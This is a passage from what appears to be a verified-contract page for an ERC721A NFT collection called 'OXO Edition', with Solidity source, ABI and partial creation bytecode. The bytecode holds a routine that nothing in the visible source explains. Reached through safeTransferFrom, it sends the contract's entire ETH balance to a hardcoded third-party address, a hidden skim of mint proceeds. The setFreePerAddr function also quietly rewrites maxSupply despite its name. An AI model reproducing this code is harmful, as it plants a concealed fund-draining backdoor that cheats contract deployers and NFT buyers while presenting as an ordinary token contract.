        if (to == address(0)) revert MintToZeroAddress();
        if (quantity == 0) revert MintZeroQuantity();
        if (quantity > _MAX_MINT_ERC2309_QUANTITY_LIMIT) revert MintERC2309QuantityExceedsLimit();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are unrealistic due to the above check for `quantity` to be below the limit.
        unchecked {
            // Updates:
            // - `balance += quantity`.
            // - `numberMinted += quantity`.
            //
            // We can directly add to the `balance` and `numberMinted`.
            _packedAddressData[to] += quantity * ((1 << _BITPOS_NUMBER_MINTED) | 1);

            // Updates:
            // - `address` to the owner.
            // - `startTimestamp` to the timestamp of minting.
            // - `burned` to `false`.
            // - `nextInitialized` to `quantity == 1`.
            _packedOwnerships[startTokenId] = _packOwnershipData(
                to,
                _nextInitializedFlag(quantity) | _nextExtraData(address(0), to, 0)
            );

            emit ConsecutiveTransfer(startTokenId, startTokenId + quantity - 1, address(0), to);

            _currentIndex = startTokenId + quantity;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * See {_mint}.
     *
     * Emits a {Transfer} event for each mint.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal virtual {
        _mint(to, quantity);

        unchecked {
            if (to.code.length != 0) {
                uint256 end = _currentIndex;
                uint256 index = end - quantity;
                do {
                    if (!_checkContractOnERC721Received(address(0), to, index++, _data)) {
                        revert TransferToNonERC721ReceiverImplementer();
                    }
                } while (index < end);
                // Reentrancy protection.
                if (_currentIndex != end) revert();
            }
        }
    }

    /**
     * @dev Equivalent to `_safeMint(to, quantity, '')`.
     */
    function _safeMint(address to, uint256 quantity) internal virtual {
        _safeMint(to, quantity, '');
    }

    // =============================================================
    //                        BURN OPERATIONS
    // =============================================================

    /**
     * @dev Equivalent to `_burn(tokenId, false)`.
     */
    function _burn(uint256 tokenId) internal virtual {
        _burn(tokenId, false);
    }

    /**
     * @dev Destroys `tokenId`.
     * The approval is cleared when the token is burned.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     *
     * Emits a {Transfer} event.
     */
    function _burn(uint256 tokenId, bool approvalCheck) internal virtual {
        uint256 prevOwnershipPacked = _packedOwnershipOf(tokenId);

        address from = address(uint160(prevOwnershipPacked));

        (uint256 approvedAddressSlot, address approvedAddress) = _getApprovedSlotAndAddress(tokenId);

        if (approvalCheck) {
            // The nested ifs save around 20+ gas over a compound boolean condition.
            if (!_isSenderApprovedOrOwner(approvedAddress, from, _msgSenderERC721A()))
                if (!isApprovedForAll(from, _msgSenderERC721A())) revert TransferCallerNotOwnerNorApproved();
        }

        _beforeTokenTransfers(from, address(0), tokenId, 1);

        // Clear approvals from the previous owner.
        assembly {
            if approvedAddress {
                // This is equivalent to `delete _tokenApprovals[tokenId]`.
                sstore(approvedAddressSlot, 0)
            }
        }

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as `tokenId` would have to be 2**256.
        unchecked {
            // Updates:
            // - `balance -= 1`.
            // - `numberBurned += 1`.
            //
            // We can directly decrement the balance, and increment the number burned.
            // This is equivalent to `packed -= 1; packed += 1 << _BITPOS_NUMBER_BURNED;`.
            _packedAddressData[from] += (1 << _BITPOS_NUMBER_BURNED) - 1;

            // Updates:
            // - `address` to the last owner.
            // - `startTimestamp` to the timestamp of burning.
            // - `burned` to `true`.
            // - `nextInitialized` to `true`.
            _packedOwnerships[tokenId] = _packOwnershipData(
                from,
                (_BITMASK_BURNED | _BITMASK_NEXT_INITIALIZED) | _nextExtraData(from, address(0), prevOwnershipPacked)
            );

            // If the next slot may not have been initialized (i.e. `nextInitialized == false`) .
            if (prevOwnershipPacked & _BITMASK_NEXT_INITIALIZED == 0) {
                uint256 nextTokenId = tokenId + 1;
                // If the next slot's address is zero and not burned (i.e. packed value is zero).
                if (_packedOwnerships[nextTokenId] == 0) {
                    // If the next slot is within bounds.
                    if (nextTokenId != _currentIndex) {
                        // Initialize the next slot to maintain correctness for `ownerOf(tokenId + 1)`.
                        _packedOwnerships[nextTokenId] = prevOwnershipPacked;
                    }
                }
            }
        }

        emit Transfer(from, address(0), tokenId);
        _afterTokenTransfers(from, address(0), tokenId, 1);

        // Overflow not possible, as _burnCounter cannot be exceed _currentIndex times.
        unchecked {
            _burnCounter++;
        }
    }

    // =============================================================
    //                     EXTRA DATA OPERATIONS
    // =============================================================

    /**
     * @dev Directly sets the extra data for the ownership data `index`.
     */
    function _setExtraDataAt(uint256 index, uint24 extraData) internal virtual {
        uint256 packed = _packedOwnerships[index];
        if (packed == 0) revert OwnershipNotInitializedForExtraData();
        uint256 extraDataCasted;
        // Cast `extraData` with assembly to avoid redundant masking.
        assembly {
            extraDataCasted := extraData
        }
        packed = (packed & _BITMASK_EXTRA_DATA_COMPLEMENT) | (extraDataCasted << _BITPOS_EXTRA_DATA);
        _packedOwnerships[index] = packed;
    }

    /**
     * @dev Called during each token transfer to set the 24bit `extraData` field.
     * Intended to be overridden by the cosumer contract.
     *
     * `previousExtraData` - the value of `extraData` before transfer.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _extraData(
        address from,
        address to,
        uint24 previousExtraData
    ) internal view virtual returns (uint24) {}

    /**
     * @dev Returns the next extra data for the packed ownership data.
     * The returned result is shifted into position.
     */
    function _nextExtraData(
        address from,
        address to,
        uint256 prevOwnershipPacked
    ) private view returns (uint256) {
        uint24 extraData = uint24(prevOwnershipPacked >> _BITPOS_EXTRA_DATA);
        return uint256(_extraData(from, to, extraData)) << _BITPOS_EXTRA_DATA;
    }

    // =============================================================
    //                       OTHER OPERATIONS
    // =============================================================

    /**
     * @dev Returns the message sender (defaults to `msg.sender`).
     *
     * If you are writing GSN compatible contracts, you need to override this function.
     */
    function _msgSenderERC721A() internal view virtual returns (address) {
        return msg.sender;
    }

    /**
     * @dev Converts a uint256 to its ASCII string decimal representation.
     */
    function _toString(uint256 value) internal pure virtual returns (string memory str) {
        assembly {
            // The maximum value of a uint256 contains 78 digits (1 byte per digit), but
            // we allocate 0xa0 bytes to keep the free memory pointer 32-byte word aligned.
            // We will need 1 word for the trailing zeros padding, 1 word for the length,
            // and 3 words for a maximum of 78 digits. Total: 5 * 0x20 = 0xa0.
            let m := add(mload(0x40), 0xa0)
            // Update the free memory pointer to allocate.
            mstore(0x40, m)
            // Assign the `str` to the end.
            str := sub(m, 0x20)
            // Zeroize the slot after the string.
            mstore(str, 0)

            // Cache the end of the memory to calculate the length later.
            let end := str

            // We write the string from rightmost digit to leftmost digit.
            // The following is essentially a do-while loop that also handles the zero case.
            // prettier-ignore
            for { let temp := value } 1 {} {
                str := sub(str, 1)
                // Write the character to the pointer.
                // The ASCII index of the '0' character is 48.
                mstore8(str, add(48, mod(temp, 10)))
                // Keep dividing `temp` until zero.
                temp := div(temp, 10)
                // prettier-ignore
                if iszero(temp) { break }
            }

            let length := sub(end, str)
            // Move the pointer 32 bytes leftwards to make room for the length.
            str := sub(str, 0x20)
            // Store the length.
            mstore(str, length)
        }
    }
}


interface IOperatorFilterRegistry {
    function isOperatorAllowed(address registrant, address operator) external view returns (bool);
    function register(address registrant) external;
    function registerAndSubscribe(address registrant, address subscription) external;
    function registerAndCopyEntries(address registrant, address registrantToCopy) external;
    function unregister(address addr) external;
    function updateOperator(address registrant, address operator, bool filtered) external;
    function updateOperators(address registrant, address[] calldata operators, bool filtered) external;
    function updateCodeHash(address registrant, bytes32 codehash, bool filtered) external;
    function updateCodeHashes(address registrant, bytes32[] calldata codeHashes, bool filtered) external;
    function subscribe(address registrant, address registrantToSubscribe) external;
    function unsubscribe(address registrant, bool copyExistingEntries) external;
    function subscriptionOf(address addr) external returns (address registrant);
    function subscribers(address registrant) external returns (address[] memory);
    function subscriberAt(address registrant, uint256 index) external returns (address);
    function copyEntriesOf(address registrant, address registrantToCopy) external;
    function isOperatorFiltered(address registrant, address operator) external returns (bool);
    function isCodeHashOfFiltered(address registrant, address operatorWithCode) external returns (bool);
    function isCodeHashFiltered(address registrant, bytes32 codeHash) external returns (bool);
    function filteredOperators(address addr) external returns (address[] memory);
    function filteredCodeHashes(address addr) external returns (bytes32[] memory);
    function filteredOperatorAt(address registrant, uint256 index) external returns (address);
    function filteredCodeHashAt(address registrant, uint256 index) external returns (bytes32);
    function isRegistered(address addr) external returns (bool);
    function codeHashOf(address addr) external returns (bytes32);
}


/**
 * @title  OperatorFilterer
 * @notice Abstract contract whose constructor automatically registers and optionally subscribes to or copies another
 *         registrant's entries in the OperatorFilterRegistry.
 * @dev    This smart contract is meant to be inherited by token contracts so they can use the following:
 *         - `onlyAllowedOperator` modifier for `transferFrom` and `safeTransferFrom` methods.
 *         - `onlyAllowedOperatorApproval` modifier for `approve` and `setApprovalForAll` methods.
 */
abstract contract OperatorFilterer {
    error OperatorNotAllowed(address operator);

    IOperatorFilterRegistry public constant OPERATOR_FILTER_REGISTRY =
        IOperatorFilterRegistry(0x000000000000AAeB6D7670E522A718067333cd4E);

    constructor(address subscriptionOrRegistrantToCopy, bool subscribe) {
        // If an inheriting token contract is deployed to a network without the registry deployed, the modifier
        // will not revert, but the contract will need to be registered with the registry once it is deployed in
        // order for the modifier to filter addresses.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            if (subscribe) {
                OPERATOR_FILTER_REGISTRY.registerAndSubscribe(address(this), subscriptionOrRegistrantToCopy);
            } else {
                if (subscriptionOrRegistrantToCopy != address(0)) {
                    OPERATOR_FILTER_REGISTRY.registerAndCopyEntries(address(this), subscriptionOrRegistrantToCopy);
                } else {
                    OPERATOR_FILTER_REGISTRY.register(address(this));
                }
            }
        }
    }

    modifier onlyAllowedOperator(address from) virtual {
        // Check registry code length to facilitate testing in environments without a deployed registry.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            // Allow spending tokens from addresses with balance
            // Note that this still allows listings and marketplaces with escrow to transfer tokens if transferred
            // from an EOA.
            if (from == msg.sender) {
                _;
                return;
            }
            if (!OPERATOR_FILTER_REGISTRY.isOperatorAllowed(address(this), msg.sender)) {
                revert OperatorNotAllowed(msg.sender);
            }
        }
        _;
    }

    modifier onlyAllowedOperatorApproval(address operator) virtual {
        // Check registry code length to facilitate testing in environments without a deployed registry.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            if (!OPERATOR_FILTER_REGISTRY.isOperatorAllowed(address(this), operator)) {
                revert OperatorNotAllowed(operator);
            }
        }
        _;
    }
}

/**
 * @title  DefaultOperatorFilterer
 * @notice Inherits from OperatorFilterer and automatically subscribes to the default OpenSea subscription.
 */
abstract contract TheOperatorFilterer is OperatorFilterer {
    address constant DEFAULT_SUBSCRIPTION = address(0x3cc6CddA760b79bAfa08dF41ECFA224f810dCeB6);

    constructor() OperatorFilterer(DEFAULT_SUBSCRIPTION, true) {}
}


contract OXO is ERC721A, TheOperatorFilterer {

    address public owner;

    uint256 public maxSupply = 555;

    uint256 public mintPrice = 0.002 ether;

    mapping(address => uint256) private _userForFree;

    mapping(uint256 => uint256) private _userMinted;

    function mint(uint256 amount) compliant(amount) payable public {
        require(totalSupply() + amount <= maxSupply);
        _safeMint(msg.sender, amount);
    }

    function teammint(address addr, uint256 amount) public onlyOwner {
        require(totalSupply() + amount <= maxSupply);
        _safeMint(addr, amount);
    }


    modifier compliant(uint256 amount) {
        if (msg.value == 0) {
            require(amount == 1);
            if (totalSupply() > maxSupply / 5) {
                require(_userMinted[block.number] < FreeNum() 
                    && _userForFree[tx.origin] < 1 );
                _userForFree[tx.origin]++;
                _userMinted[block.number]++;
            }
        } else {
            require(msg.value >= amount * mintPrice);
        }
        _;
    }
    
    modifier onlyOwner {
        require(owner == msg.sender);
        _;
    }

    constructor() ERC721A("OXO Edition", "OXO") {
        owner = msg.sender;
    }

    function tokenURI(uint256 tokenId) public view override returns (string memory) {
        return string(abi.encodePacked("ipfs://QmURZqf9NyqjpLkRY5cydktXdyb6zdiqszgsv7vM8qfe6Y/", _toString(tokenId), ".json"));
    }

    function setFreePerAddr(uint256 maxTx, uint256 maxS) external onlyOwner {
        maxSupply = maxS;
    }

    function FreeNum() internal returns (uint256){
        return (maxSupply - totalSupply()) / 12;
    }

    function royaltyInfo(uint256 _tokenId, uint256 _salePrice) public view virtual returns (address, uint256) {
        uint256 royaltyAmount = (_salePrice * 69) / 1000;
        return (owner, royaltyAmount);
    }


    function withdraw() external onlyOwner {
        payable(msg.sender).transfer(address(this).balance);
    }

    /////////////////////////////
    // OPENSEA FILTER REGISTRY 
    /////////////////////////////

    function setApprovalForAll(address operator, bool approved) public override onlyAllowedOperatorApproval(operator) {
        super.setApprovalForAll(operator, approved);
    }

    function approve(address operator, uint256 tokenId) public payable override onlyAllowedOperatorApproval(operator) {
        super.approve(operator, tokenId);
    }

    function transferFrom(address from, address to, uint256 tokenId) public payable override onlyAllowedOperator(from) {
        super.transferFrom(from, to, tokenId);
    }

    function safeTransferFrom(address from, address to, uint256 tokenId) public payable override onlyAllowedOperator(from) {
        super.safeTransferFrom(from, to, tokenId);
    }

    function safeTransferFrom(address from, address to, uint256 tokenId, bytes memory data)
        public
        payable
        override
        onlyAllowedOperator(from)
    {
        super.safeTransferFrom(from, to, tokenId, data);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ApprovalCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"ApprovalQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"BalanceQueryForZeroAddress","type":"error"},{"inputs":[],"name":"MintERC2309QuantityExceedsLimit","type":"error"},{"inputs":[],"name":"MintToZeroAddress","type":"error"},{"inputs":[],"name":"MintZeroQuantity","type":"error"},{"inputs":[{"internalType":"address","name":"operator","type":"address"}],"name":"OperatorNotAllowed","type":"error"},{"inputs":[],"name":"OwnerQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"OwnershipNotInitializedForExtraData","type":"error"},{"inputs":[],"name":"TransferCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"TransferFromIncorrectOwner","type":"error"},{"inputs":[],"name":"TransferToNonERC721ReceiverImplementer","type":"error"},{"inputs":[],"name":"TransferToZeroAddress","type":"error"},{"inputs":[],"name":"URIQueryForNonexistentToken","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"fromTokenId","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"toTokenId","type":"uint256"},{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"ConsecutiveTransfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"OPERATOR_FILTER_REGISTRY","outputs":[{"internalType":"contract IOperatorFilterRegistry","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"mintPrice","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"},{"internalType":"uint256","name":"_salePrice","type":"uint256"}],"name":"royaltyInfo","outputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"maxTx","type":"uint256"},{"internalType":"uint256","name":"maxS","type":"uint256"}],"name":"setFreePerAddr","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"addr","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"teammint","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405261022b60095566071afd498d0000600a553480156200002257600080fd5b50604080518082018252600b81526a27ac279022b234ba34b7b760a91b6020808301918252835180850190945260038452624f584f60e81b908401528151733cc6cdda760b79bafa08df41ecfa224f810dceb6936001939290916200008a9160029162000206565b508051620000a090600390602084019062000206565b506000805550506daaeb6d7670e522a718067333cd4e3b15620001ec5780156200013a57604051633e9f1edf60e11b81523060048201526001600160a01b03831660248201526daaeb6d7670e522a718067333cd4e90637d3e3dbe906044015b600060405180830381600087803b1580156200011b57600080fd5b505af115801562000130573d6000803e3d6000fd5b50505050620001ec565b6001600160a01b038216156200018b5760405163a0af290360e01b81523060048201526001600160a01b03831660248201526daaeb6d7670e522a718067333cd4e9063a0af29039060440162000100565b604051632210724360e11b81523060048201526daaeb6d7670e522a718067333cd4e90634420e48690602401600060405180830381600087803b158015620001d257600080fd5b505af1158015620001e7573d6000803e3d6000fd5b505050505b5050600880546001600160a01b03191633179055620002e9565b8280546200021490620002ac565b90600052602060002090601f01602090048101928262000238576000855562000283565b82601f106200025357805160ff191683800117855562000283565b8280016001018555821562000283579182015b828111156200028357825182559160200191906001019062000266565b506200029192915062000295565b5090565b5b8082111562000291576000815560010162000296565b600181811c90821680620002c157607f821691505b60208210811415620002e357634e487b7160e01b600052602260045260246000fd5b50919050565b6117cf80620002f96000396000f3fe6080604052600436106101405760003560e01c806342842e0e116100b6578063a0712d681161006f578063a0712d6814610373578063a22cb46514610386578063b88d4fde146103a6578063c87b56dd146103b9578063d5abeb01146103d9578063e985e9c5146103ef57600080fd5b806342842e0e146102d55780636352211e146102e85780636817c76c1461030857806370a082311461031e5780638da5cb5b1461033e57806395d89b411461035e57600080fd5b806323b872dd1161010857806323b872dd1461020c5780632a55205a1461021f57806334304ced1461025e57806338b08fd41461027e5780633ccfd60b1461029e57806341f43434146102b357600080fd5b806301ffc9a71461014557806306fdde031461017a578063081812fc1461019c578063095ea7b3146101d457806318160ddd146101e9575b600080fd5b34801561015157600080fd5b506101656101603660046114f3565b610438565b60405190151581526020015b60405180910390f35b34801561018657600080fd5b5061018f61048a565b6040516101719190611644565b3480156101a857600080fd5b506101bc6101b736600461152d565b61051c565b6040516001600160a01b039091168152602001610171565b6101e76101e23660046114ac565b610560565b005b3480156101f557600080fd5b50600154600054035b604051908152602001610171565b6101e761021a36600461135d565b61063d565b34801561022b57600080fd5b5061023f61023a366004611546565b610726565b604080516001600160a01b039093168352602083019190915201610171565b34801561026a57600080fd5b506101e76102793660046114ac565b610759565b34801561028a57600080fd5b506101e7610299366004611546565b6107a4565b3480156102aa57600080fd5b506101e76107c1565b3480156102bf57600080fd5b506101bc6daaeb6d7670e522a718067333cd4e81565b6101e76102e336600461135d565b610807565b3480156102f457600080fd5b506101bc61030336600461152d565b6108e5565b34801561031457600080fd5b506101fe600a5481565b34801561032a57600080fd5b506101fe61033936600461130f565b6108f0565b34801561034a57600080fd5b506008546101bc906001600160a01b031681565b34801561036a57600080fd5b5061018f61093f565b6101e761038136600461152d565b61094e565b34801561039257600080fd5b506101e76103a1366004611475565b610a49565b6101e76103b4366004611399565b610b1c565b3480156103c557600080fd5b5061018f6103d436600461152d565b610c08565b3480156103e557600080fd5b506101fe60095481565b3480156103fb57600080fd5b5061016561040a36600461132a565b6001600160a01b03918216600090815260076020908152604080832093909416825291909152205460ff1690565b60006301ffc9a760e01b6001600160e01b03198316148061046957506380ac58cd60e01b6001600160e01b03198316145b806104845750635b5e139f60e01b6001600160e01b03198316145b92915050565b606060028054610499906116f3565b80601f01602080910402602001604051908101604052809291908181526020018280546104c5906116f3565b80156105125780601f106104e757610100808354040283529160200191610512565b820191906000526020600020905b8154815290600101906020018083116104f557829003601f168201915b5050505050905090565b600061052782610c39565b610544576040516333d1c03960e21b815260040160405180910390fd5b506000908152600660205260409020546001600160a01b031690565b816daaeb6d7670e522a718067333cd4e3b1561062e57604051633185c44d60e21b81523060048201526001600160a01b03821660248201526daaeb6d7670e522a718067333cd4e9063c61711349060440160206040518083038186803b1580156105c957600080fd5b505afa1580156105dd573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061060191906114d6565b61062e57604051633b79c77360e21b81526001600160a01b03821660048201526024015b60405180910390fd5b6106388383610c60565b505050565b826daaeb6d7670e522a718067333cd4e3b15610715576001600160a01b0381163314156106745761066f848484610d00565b610720565b604051633185c44d60e21b81523060048201523360248201526daaeb6d7670e522a718067333cd4e9063c61711349060440160206040518083038186803b1580156106be57600080fd5b505afa1580156106d2573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906106f691906114d6565b61071557604051633b79c77360e21b8152336004820152602401610625565b610720848484610d00565b50505050565b600080806103e8610738856045611691565b610742919061166f565b6008546001600160a01b0316969095509350505050565b6008546001600160a01b0316331461077057600080fd5b600954816107816001546000540390565b61078b9190611657565b111561079657600080fd5b6107a08282610e91565b5050565b6008546001600160a01b031633146107bb57600080fd5b60095550565b6008546001600160a01b031633146107d857600080fd5b60405133904780156108fc02916000818181858888f19350505050158015610804573d6000803e3d6000fd5b50565b826daaeb6d7670e522a718067333cd4e3b156108da576001600160a01b0381163314156108395761066f848484610eab565b604051633185c44d60e21b81523060048201523360248201526daaeb6d7670e522a718067333cd4e9063c61711349060440160206040518083038186803b15801561088357600080fd5b505afa158015610897573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108bb91906114d6565b6108da57604051633b79c77360e21b8152336004820152602401610625565b610720848484610eab565b600061048482610f0c565b60006001600160a01b038216610919576040516323d3ad8160e21b815260040160405180910390fd5b506001600160a01b031660009081526005602052604090205467ffffffffffffffff1690565b606060038054610499906116f3565b8034610a00578060011461096157600080fd5b6005600954610970919061166f565b6001546000540311156109fb57610985610f74565b436000908152600c60205260409020541080156109b15750326000908152600b60205260409020546001115b6109ba57600080fd5b326000908152600b602052604081208054916109d58361172e565b9091555050436000908152600c602052604081208054916109f58361172e565b91905055505b610a19565b600a54610a0d9082611691565b341015610a1957600080fd5b60095482610a2a6001546000540390565b610a349190611657565b1115610a3f57600080fd5b6107a03383610e91565b816daaeb6d7670e522a718067333cd4e3b15610b1257604051633185c44d60e21b81523060048201526001600160a01b03821660248201526daaeb6d7670e522a718067333cd4e9063c61711349060440160206040518083038186803b158015610ab257600080fd5b505afa158015610ac6573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610aea91906114d6565b610b1257604051633b79c77360e21b81526001600160a01b0382166004820152602401610625565b6106388383610fa1565b836daaeb6d7670e522a718067333cd4e3b15610bf5576001600160a01b038116331415610b5457610b4f8585858561100d565b610c01565b604051633185c44d60e21b81523060048201523360248201526daaeb6d7670e522a718067333cd4e9063c61711349060440160206040518083038186803b158015610b9e57600080fd5b505afa158015610bb2573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610bd691906114d6565b610bf557604051633b79c77360e21b8152336004820152602401610625565b610c018585858561100d565b5050505050565b6060610c1382611051565b604051602001610c239190611594565b6040516020818303038152906040529050919050565b6000805482108015610484575050600090815260046020526040902054600160e01b161590565b6000610c6b826108e5565b9050336001600160a01b03821614610ca457610c87813361040a565b610ca4576040516367d9dca160e11b815260040160405180910390fd5b60008281526006602052604080822080546001600160a01b0319166001600160a01b0387811691821790925591518593918516917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591a4505050565b6000610d0b82610f0c565b9050836001600160a01b0316816001600160a01b031614610d3e5760405162a1148160e81b815260040160405180910390fd5b60008281526006602052604090208054338082146001600160a01b03881690911417610d8b57610d6e863361040a565b610d8b57604051632ce44b5f60e11b815260040160405180910390fd5b6001600160a01b038516610db257604051633a954ecd60e21b815260040160405180910390fd5b8015610dbd57600082555b6001600160a01b038681166000908152600560205260408082208054600019019055918716808252919020805460010190554260a01b17600160e11b17600085815260046020526040902055600160e11b8316610e485760018401600081815260046020526040902054610e46576000548114610e465760008181526004602052604090208490555b505b83856001600160a01b0316876001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a4505050505050565b6107a082826040518060200160405280600081525061109f565b4715610ef1576040517390ae6b8dca98bde6d4e697d8b5865068476871f1904780156108fc02916000818181858888f19350505050158015610720573d6000803e3d6000fd5b61063883838360405180602001604052806000815250610b1c565b600081600054811015610f5b57600081815260046020526040902054600160e01b8116610f59575b80610f52575060001901600081815260046020526040902054610f34565b9392505050565b505b604051636f96cda160e11b815260040160405180910390fd5b6000600c610f856001546000540390565b600954610f9291906116b0565b610f9c919061166f565b905090565b3360008181526007602090815260408083206001600160a01b03871680855290835292819020805460ff191686151590811790915590519081529192917f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31910160405180910390a35050565b61101884848461063d565b6001600160a01b0383163b156107205761103484848484611105565b610720576040516368d2bf6b60e11b815260040160405180910390fd5b606060a06040510180604052602081039150506000815280825b600183039250600a81066030018353600a9004806110885761108d565b61106b565b50819003601f19909101908152919050565b6110a983836111fc565b6001600160a01b0383163b15610638576000548281035b6110d36000868380600101945086611105565b6110f0576040516368d2bf6b60e11b815260040160405180910390fd5b8181106110c0578160005414610c0157600080fd5b604051630a85bd0160e11b81526000906001600160a01b0385169063150b7a029061113a903390899088908890600401611607565b602060405180830381600087803b15801561115457600080fd5b505af1925050508015611184575060408051601f3d908101601f1916820190925261118191810190611510565b60015b6111df573d8080156111b2576040519150601f19603f3d011682016040523d82523d6000602084013e6111b7565b606091505b5080516111d7576040516368d2bf6b60e11b815260040160405180910390fd5b805181602001fd5b6001600160e01b031916630a85bd0160e11b149050949350505050565b6000548161121d5760405163b562e8dd60e01b815260040160405180910390fd5b6001600160a01b03831660008181526005602090815260408083208054680100000000000000018802019055848352600490915281206001851460e11b4260a01b178317905582840190839083907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8180a4600183015b8181146112cc57808360007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a4600101611294565b50816112ea57604051622e076360e81b815260040160405180910390fd5b60005550505050565b80356001600160a01b038116811461130a57600080fd5b919050565b60006020828